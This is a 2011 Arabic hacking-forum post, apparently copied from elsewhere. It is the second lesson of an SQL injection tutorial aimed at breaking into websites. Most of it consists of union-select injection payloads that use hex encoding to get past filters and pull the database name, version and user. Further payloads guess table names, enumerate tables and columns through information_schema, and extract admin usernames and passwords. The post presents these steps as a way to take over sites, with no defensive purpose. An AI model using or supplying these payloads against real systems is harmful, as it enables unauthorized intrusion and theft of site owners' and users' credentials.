بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile


تعليم اصول الهكر
 
الرئيسيةالبوابةالمنشوراتبحـثالأعضاءالتسجيلدخول

شاطر | 
 

 الدرس الثاني لاحتراف SQL

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin


avatar

عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
المزاج المزاج : Don't Play With Me

مُساهمةموضوع: الدرس الثاني لاحتراف SQL   الخميس أغسطس 25, 2011 9:09 pm

السلام عليكم


اليوم الدرس الثاني لاحتراف السكيو ال


.......



أسلوب التشفير :

نبتدي من حيث إنتهين في الجزء الأول إد توقفن عند كيفية جلب بعض المعلومات السرية بواسطة الحقن ومن بين هده المعلومات : database , version , user
وفي ناس بعد قراة الموضوع تمكنت والحمد لله من فعل دالك بس نفترض يجيني
واحد ويقولي أنا عملت زي ما قلت لي بالضبط ووصلت للأعمدة المصابة بس لم
أكتب أمر جلب القاعدة أو الإصدار أو اليوزر ما يطلع شيء وتبدئ التساؤلات
وحد يقلك ممكن من الجهاز واحد يقولك من ضعف الإتصال لووووول بس كل ما في
الأمر أن في مواقع لاتسمح لك بإستعمال السكيول إنجكشن بس شو الحل يا Cyber-Zone
أأأأه في هده الحالة نستعمل التشفير بالهكس لجلب المعلومات والأمر بسيط للغاية شوفو كيف

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,unhex(hex(database())),unhex(hex(version())),unh ex(hex(user())),5/*

وكدا راح تطلع المعلومات بالغصب
وكد نكون إنتهينا من جزء مهم في سكيول إنجكشن وندخل الأن في الجزء المتقدم من هده الثغرة.
** ** ** ** **


والإن أصدقاء ندخل للجزء المثير في الحقن d: يعني لو أردنا إختراق موقع مش
حنكتفي بالمعلومات الي إستخرجناها من قبل يعني لازم نستخرج الباس واليوزر
ولدالك نستعمل طريقتين على حسب إصدار القاعدة فإن كانت إصدار رابع سنعتمد
على التخمين كليا وإن كانت إصدار خامس فنعتمد على information schema
وقلييييييل من التخمين يلا نشوف أسلوب التخمين الكلي

التخمين :

يعني حبيبي في هدا الجزء الدي أكرهه حقيقة لازم تكون
عندك قائمة بأسماءاليوزرت والباسووردات وقواعد البيانات المحتملة في الموقع
وقولو لحسين ينزلها ليكو على الموقع
نشوف أمثله لليوزرات
user & users & username & admin & login &
member
نشوف أمثله للباس
password & pass & passwd & pwd
أمثلة لأسماء القواعد
user , users , mysql.user , mysql.db
نروح ونشوف الإستغلال كيف يتم :
الان مثلا اسم القاعده في الموقع ( users ) لو نريد نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,user,3,4,5+from+users/*
ونفس الاستغلال السابق لليوزر لو نريد نستخرج باسوورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,password,3,4,5+from+users/*
وإد ما نفعت هالكلمات نروح للتالية لبين ما تشتغل معانا
تمام بالنسبة للتخمين.

بالنسبة لل information schema :

فيتماشى هدا الحقن كثيرا مع القواعد دات الإصدار الخامس وراح ندخل مباشرة في التطبيق للسهولة هدا النوع نشوف :
لاستخراج الجداول في قواعد البيانات وقت الحقن :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,table_name,3,4,5+from+information_schema.tables/*
لاستخراج الاعمده في قواعد البيانات وقت الحقن :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,column_name,3,4,5+from+information_schema.column s/*
لإستخراجهما معا هكدا:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select
1,concat_ws(0x3a3a,table_name,column_name),3,4,5+f
rom+information_schema.columns/*

نفرض طبعا خرجت لينا المعلومات ده
tbl_admins::login:ass

راح يكون الإستغلال كدا :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,concat_ws(0x3a3a,login,pass),3,4,5+from+tbl_admi ns/*
أتمنى تكون وصلت الفكرة:d
بس في مرات لما بنحاول نبحث عن الجداول والأعمدة ما بيطلع لينا غير جدول واحد وطريقة تخطي هدا المشكل سهلة دالك بإستعمال LIMIT
شاهد هدا الفيديو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تمام أتمنى تكونو فهمتو LIMIT
والأأن نفترض إن الموقع فيه يوزرات كثيرة وما عرفنا وين الأدمن :d
والحل بسيط شوف كيف :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] union select 1,user,3,4,5+from+users+where+userid=1/*
وطبعا طلبنا في هدا الأمر إحضار العضوية الأولى وهي بتاعت الأدمن ^^


...

منقول







[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


[size=24]للشكاوي   و الاقتراحات 

[/size]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://mr11-11mr.7olm.org
 
الدرس الثاني لاحتراف SQL
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بدايه تعلم الهكر من الصفر الى الاحتراف :: دروس لرفع الشلات اختراق المواقع الاجهزه دورات مجانيه شرحphp شرح Perl-
انتقل الى: